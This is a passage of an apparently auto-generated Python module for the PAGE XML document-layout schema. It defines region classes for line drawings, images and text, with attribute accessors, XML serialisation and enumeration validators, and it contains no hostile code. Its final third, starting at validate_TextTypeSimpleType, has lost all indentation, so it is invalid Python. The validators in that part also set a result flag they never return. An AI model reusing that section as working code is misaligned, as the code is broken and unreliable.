        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LineDrawingRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LineDrawingRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LineDrawingRegionType'):
        """Write this element's XML attributes, after the superclass's own."""
        super(LineDrawingRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LineDrawingRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.penColour is not None and 'penColour' not in already_processed:
            already_processed.add('penColour')
            outfile.write(' penColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.penColour), input_name='penColour')), ))
        if self.bgColour is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
        if self.embText is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LineDrawingRegionType', fromsubclass_=False, pretty_print=True):
        # LineDrawingRegionType adds no children of its own; delegate to RegionType.
        super(LineDrawingRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree/lxml *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read this element's XML attributes from *node*, then delegate to the superclass."""
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('penColour', node)
        if value is not None and 'penColour' not in already_processed:
            already_processed.add('penColour')
            self.penColour = value
            self.validate_ColourSimpleType(self.penColour) # validate type ColourSimpleType
        value = find_attr_value_('bgColour', node)
        if value is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            self.bgColour = value
            self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
        value = find_attr_value_('embText', node)
        if value is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            if value in ('true', '1'):
                self.embText = True
            elif value in ('false', '0'):
                self.embText = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        super(LineDrawingRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # LineDrawingRegionType defines no extra children; RegionType handles them all.
        super(LineDrawingRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class LineDrawingRegionType
class ImageRegionType(RegionType):
    """Region subtype for images: content more intricate and complex than
    a graphic, e.g. photos or drawings.

    XML attributes (all optional):
      orientation -- clockwise rotation angle (degrees, range -179.999..180)
                     needed to correct the region's skew; negative values
                     indicate anti-clockwise rotation.
      colourDepth -- colour bit depth required for the region
                     (pc:ColourDepthSimpleType).
      bgColour    -- background colour (pc:ColourSimpleType).
      embText     -- whether the region also contains text.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Generated member specifications used by the marshalling machinery.
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('colourDepth', 'pc:ColourDepthSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, colourDepth=None, bgColour=None, embText=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("ImageRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.colourDepth = _cast(None, colourDepth)
        self.colourDepth_nsprefix_ = None
        self.bgColour = _cast(None, bgColour)
        self.bgColour_nsprefix_ = None
        self.embText = _cast(bool, embText)
        self.embText_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an ImageRegionType instance (or a registered subclass)."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ImageRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if ImageRegionType.subclass:
            return ImageRegionType.subclass(*args_, **kwargs_)
        else:
            return ImageRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # --- Generated accessors ---
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_colourDepth(self):
        return self.colourDepth
    def set_colourDepth(self, colourDepth):
        self.colourDepth = colourDepth
    def get_bgColour(self):
        return self.bgColour
    def set_bgColour(self, bgColour):
        self.bgColour = bgColour
    def get_embText(self):
        return self.embText
    def set_embText(self, embText):
        self.embText = embText
    def validate_ColourDepthSimpleType(self, value):
        """Validate *value* against pc:ColourDepthSimpleType (xsd string enumeration).

        Violations are reported to self.gds_collector_. Returns True when the
        value is valid (or validation is disabled), False otherwise.
        """
        # Fix: the generated code assigned ``result = False`` without ever
        # returning it; now a boolean is returned on every path.
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['bilevel', 'greyscale', 'colour', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourDepthSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def validate_ColourSimpleType(self, value):
        """Validate *value* against pc:ColourSimpleType (xsd string enumeration).

        Violations are reported to self.gds_collector_. Returns True when the
        value is valid (or validation is disabled), False otherwise.
        """
        # Fix: same missing-return defect as validate_ColourDepthSimpleType.
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        """Return True when this element has child content to serialize."""
        if (
            super(ImageRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ImageRegionType', pretty_print=True):
        """Serialize this element (tag, attributes, children) as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ImageRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'ImageRegionType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ImageRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ImageRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ImageRegionType'):
        """Write this element's XML attributes, after the superclass's own."""
        super(ImageRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ImageRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.colourDepth is not None and 'colourDepth' not in already_processed:
            already_processed.add('colourDepth')
            outfile.write(' colourDepth=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.colourDepth), input_name='colourDepth')), ))
        if self.bgColour is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
        if self.embText is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ImageRegionType', fromsubclass_=False, pretty_print=True):
        # ImageRegionType adds no children of its own; delegate to RegionType.
        super(ImageRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree/lxml *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read this element's XML attributes from *node*, then delegate to the superclass."""
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('colourDepth', node)
        if value is not None and 'colourDepth' not in already_processed:
            already_processed.add('colourDepth')
            self.colourDepth = value
            self.validate_ColourDepthSimpleType(self.colourDepth) # validate type ColourDepthSimpleType
        value = find_attr_value_('bgColour', node)
        if value is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            self.bgColour = value
            self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
        value = find_attr_value_('embText', node)
        if value is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            if value in ('true', '1'):
                self.embText = True
            elif value in ('false', '0'):
                self.embText = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        super(ImageRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # ImageRegionType defines no extra children; RegionType handles them all.
        super(ImageRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class ImageRegionType
class TextRegionType(RegionType):
    """Region subtype for pure text (including drop capitals; ornate text
    may instead be treated as a graphic).

    XML attributes (all optional):
      orientation        -- clockwise rotation angle (degrees, range
                            -179.999..180) correcting the region's skew;
                            negative values indicate anti-clockwise rotation.
                            (The rotated image can be further referenced via
                            AlternativeImage.)
      type_              -- nature of the text (pc:TextTypeSimpleType).
      leading            -- line spacing in points.
      readingDirection   -- order of words and characters within lines,
                            in addition to textLineOrder.
      textLineOrder      -- order of text lines within the block,
                            in addition to readingDirection.
      readingOrientation -- baseline rotation of text relative to the region
                            rectangle, clockwise, in addition to orientation
                            (range -179.999..180).
      indented           -- whether the text region is indented.
      align              -- text alignment (pc:AlignSimpleType).
      primaryLanguage / secondaryLanguage -- languages used in the region.
      primaryScript / secondaryScript     -- scripts used in the region.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Generated member specifications used by the marshalling machinery.
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('type_', 'pc:TextTypeSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('leading', 'int', 0, 1, {'use': 'optional'}),
        MemberSpec_('readingDirection', 'pc:ReadingDirectionSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('textLineOrder', 'pc:TextLineOrderSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('readingOrientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('indented', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('align', 'pc:AlignSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('primaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('secondaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('primaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('secondaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('production', 'pc:ProductionSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('TextLine', 'TextLineType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextLine', 'type': 'TextLineType'}, None),
        MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
        MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, type_=None, leading=None, readingDirection=None, textLineOrder=None, readingOrientation=None, indented=None, align=None, primaryLanguage=None, secondaryLanguage=None, primaryScript=None, secondaryScript=None, production=None, TextLine=None, TextEquiv=None, TextStyle=None, gds_collector_=None, **kwargs_):
        """Initialize a TextRegionType.

        RegionType arguments are forwarded to the superclass; the remaining
        keyword arguments set this class's XML attributes and the TextLine,
        TextEquiv and TextStyle child elements (list-valued children default
        to empty lists).
        """
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("TextRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.leading = _cast(int, leading)
        self.leading_nsprefix_ = None
        self.readingDirection = _cast(None, readingDirection)
        self.readingDirection_nsprefix_ = None
        self.textLineOrder = _cast(None, textLineOrder)
        self.textLineOrder_nsprefix_ = None
        self.readingOrientation = _cast(float, readingOrientation)
        self.readingOrientation_nsprefix_ = None
        self.indented = _cast(bool, indented)
        self.indented_nsprefix_ = None
        self.align = _cast(None, align)
        self.align_nsprefix_ = None
        self.primaryLanguage = _cast(None, primaryLanguage)
        self.primaryLanguage_nsprefix_ = None
        self.secondaryLanguage = _cast(None, secondaryLanguage)
        self.secondaryLanguage_nsprefix_ = None
        self.primaryScript = _cast(None, primaryScript)
        self.primaryScript_nsprefix_ = None
        self.secondaryScript = _cast(None, secondaryScript)
        self.secondaryScript_nsprefix_ = None
        self.production = _cast(None, production)
        self.production_nsprefix_ = None
        if TextLine is None:
            self.TextLine = []
        else:
            self.TextLine = TextLine
        self.TextLine_nsprefix_ = "pc"
        if TextEquiv is None:
            self.TextEquiv = []
        else:
            self.TextEquiv = TextEquiv
        self.TextEquiv_nsprefix_ = "pc"
        self.TextStyle = TextStyle
        self.TextStyle_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create a TextRegionType instance (or a registered subclass).

        If a subclass module was registered via CurrentSubclassModule_, or a
        subclass was assigned to TextRegionType.subclass, an instance of that
        subclass is returned instead of the base class.
        """
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, TextRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if TextRegionType.subclass:
            return TextRegionType.subclass(*args_, **kwargs_)
        else:
            return TextRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # --- Generated accessors for child elements (TextLine, TextEquiv,
    # --- TextStyle) and for the XML attributes. List-valued children also
    # --- get add/insert/replace helpers. ---
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_TextLine(self):
        return self.TextLine
    def set_TextLine(self, TextLine):
        self.TextLine = TextLine
    def add_TextLine(self, value):
        self.TextLine.append(value)
    def insert_TextLine_at(self, index, value):
        self.TextLine.insert(index, value)
    def replace_TextLine_at(self, index, value):
        self.TextLine[index] = value
    def get_TextEquiv(self):
        return self.TextEquiv
    def set_TextEquiv(self, TextEquiv):
        self.TextEquiv = TextEquiv
    def add_TextEquiv(self, value):
        self.TextEquiv.append(value)
    def insert_TextEquiv_at(self, index, value):
        self.TextEquiv.insert(index, value)
    def replace_TextEquiv_at(self, index, value):
        self.TextEquiv[index] = value
    def get_TextStyle(self):
        return self.TextStyle
    def set_TextStyle(self, TextStyle):
        self.TextStyle = TextStyle
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_leading(self):
        return self.leading
    def set_leading(self, leading):
        self.leading = leading
    def get_readingDirection(self):
        return self.readingDirection
    def set_readingDirection(self, readingDirection):
        self.readingDirection = readingDirection
    def get_textLineOrder(self):
        return self.textLineOrder
    def set_textLineOrder(self, textLineOrder):
        self.textLineOrder = textLineOrder
    def get_readingOrientation(self):
        return self.readingOrientation
    def set_readingOrientation(self, readingOrientation):
        self.readingOrientation = readingOrientation
    def get_indented(self):
        return self.indented
    def set_indented(self, indented):
        self.indented = indented
    def get_align(self):
        return self.align
    def set_align(self, align):
        self.align = align
    def get_primaryLanguage(self):
        return self.primaryLanguage
    def set_primaryLanguage(self, primaryLanguage):
        self.primaryLanguage = primaryLanguage
    def get_secondaryLanguage(self):
        return self.secondaryLanguage
    def set_secondaryLanguage(self, secondaryLanguage):
        self.secondaryLanguage = secondaryLanguage
    def get_primaryScript(self):
        return self.primaryScript
    def set_primaryScript(self, primaryScript):
        self.primaryScript = primaryScript
    def get_secondaryScript(self):
        return self.secondaryScript
    def set_secondaryScript(self, secondaryScript):
        self.secondaryScript = secondaryScript
    def get_production(self):
        return self.production
    def set_production(self, production):
        self.production = production
def validate_TextTypeSimpleType(self, value):
# Validate type pc:TextTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['paragraph', 'heading', 'caption', 'header', 'footer', 'page-number', 'drop-capital', 'credit', 'floating', 'signature-mark', 'catch-word', 'marginalia', 'footnote', 'footnote-continued', 'endnote', 'TOC-entry', 'list-label', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on TextTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ReadingDirectionSimpleType(self, value):
# Validate type pc:ReadingDirectionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left-to-right', 'right-to-left', 'top-to-bottom', 'bottom-to-top']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ReadingDirectionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_TextLineOrderSimpleType(self, value):
# Validate type pc:TextLineOrderSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['top-to-bottom', 'bottom-to-top', 'left-to-right', 'right-to-left']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on TextLineOrderSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_AlignSimpleType(self, value):
# Validate type pc:AlignSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left', 'centre', 'right', 'justify']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on AlignSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_LanguageSimpleType(self, value):
# Validate type pc:LanguageSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Abkhaz', 'Afar', 'Afrikaans', 'Akan', 'Albanian', 'Amharic', 'Arabic', 'Aragonese', 'Armenian', 'Assamese', 'Avaric', 'Avestan', 'Aymara', 'Azerbaijani', 'Bambara', 'Bashkir', 'Basque', 'Belarusian', 'Bengali', 'Bihari', 'Bislama', 'Bosnian', 'Breton', 'Bulgarian', 'Burmese', 'Cambodian', 'Cantonese', 'Catalan', 'Chamorro', 'Chechen', 'Chichewa', 'Chinese', 'Chuvash', 'Cornish', 'Corsican', 'Cree', 'Croatian', 'Czech', 'Danish', 'Divehi', 'Dutch', 'Dzongkha', 'English', 'Esperanto', 'Estonian', 'Ewe', 'Faroese', 'Fijian', 'Finnish', 'French', 'Fula', 'Gaelic', 'Galician', 'Ganda', 'Georgian', 'German', 'Greek', 'Guaraní', 'Gujarati', 'Haitian', 'Hausa', 'Hebrew', 'Herero', 'Hindi', 'Hiri Motu', 'Hungarian', 'Icelandic', 'Ido', 'Igbo', 'Indonesian', 'Interlingua', 'Interlingue', 'Inuktitut', 'Inupiaq', 'Irish', 'Italian', 'Japanese', 'Javanese', 'Kalaallisut', 'Kannada', 'Kanuri', 'Kashmiri', 'Kazakh', 'Khmer', 'Kikuyu', 'Kinyarwanda', 'Kirundi', 'Komi', 'Kongo', 'Korean', 'Kurdish', 'Kwanyama', 'Kyrgyz', 'Lao', 'Latin', 'Latvian', 'Limburgish', 'Lingala', 'Lithuanian', 'Luba-Katanga', 'Luxembourgish', 'Macedonian', 'Malagasy', 'Malay', 'Malayalam', 'Maltese', 'Manx', 'Māori', 'Marathi', 'Marshallese', 'Mongolian', 'Nauru', 'Navajo', 'Ndonga', 'Nepali', 'North Ndebele', 'Northern Sami', 'Norwegian', 'Norwegian Bokmål', 'Norwegian Nynorsk', 'Nuosu', 'Occitan', 'Ojibwe', 'Old Church Slavonic', 'Oriya', 'Oromo', 'Ossetian', 'Pāli', 'Panjabi', 'Pashto', 'Persian', 'Polish', 'Portuguese', 'Punjabi', 'Quechua', 'Romanian', 'Romansh', 'Russian', 'Samoan', 'Sango', 'Sanskrit', 'Sardinian', 'Serbian', 'Shona', 'Sindhi', 'Sinhala', 'Slovak', 'Slovene', 'Somali', 'South Ndebele', 'Southern Sotho', 'Spanish', 'Sundanese', 'Swahili', 'Swati', 'Swedish', 'Tagalog', 'Tahitian', 'Tajik', 'Tamil', 'Tatar', 'Telugu', 'Thai', 'Tibetan', 'Tigrinya', 'Tonga', 'Tsonga', 'Tswana', 'Turkish', 'Turkmen', 'Twi', 'Uighur', 'Ukrainian', 'Urdu', 'Uzbek', 'Venda', 'Vietnamese', 
'Volapük', 'Walloon', 'Welsh', 'Western Frisian', 'Wolof', 'Xhosa', 'Yiddish', 'Yoruba', 'Zhuang', 'Zulu', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on LanguageSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ScriptSimpleType(self, value):
# Validate type pc:ScriptSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan 